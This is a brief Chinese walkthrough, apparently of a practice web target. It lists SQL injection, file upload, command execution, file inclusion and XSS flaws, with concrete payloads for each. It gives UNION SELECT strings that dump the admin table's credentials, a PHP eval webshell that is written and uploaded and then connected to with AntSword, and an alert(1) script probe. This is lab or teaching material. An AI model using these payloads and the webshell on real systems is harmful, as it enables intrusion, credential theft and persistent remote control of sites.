1、SQL注入漏洞

1、在搜索框输入-1 union select 1,2,3#

2、输入-1 union select 1,2,database()# ，可以得出数据库名

3、输入-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#，可以得出数据库中的表名

4、输入-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#，可以得出表中的列

5、输入-1 union select 1,2,group_concat(user_name,user_pass) from admin#，可以得出admin表中的数据

6、使用查询的账号密码即可登陆后台

2、文件上传漏洞

1、登陆后台后最底部可以上传文件

2、编辑一个内容为一句话木马的PHP文件

3、上传PHP文件，得出文件上传地址

4、访问上传的PHP文件，并使用蚁剑连接

3、命令执行漏洞

1、在页面最下方有一个命令执行框

2、输入系统命令会执行，输入whoami

3、尝试写入一句话木马 echo '<?php @eval($_POST[cmd]);?>' > 7.php

4、访问7.php

5、页面没有出错，使用蚁剑连接

4、文件包含漏洞

1、在“关于”界面中可以看到本页面是直接采用本地包含，尝试看看能否包含其他文件

2、在file后添加sxy1.php，并访问该文件

5、XSS漏洞

1、在登陆界面的username处输入<script>alert(1)</script>,点击登录，会出现弹窗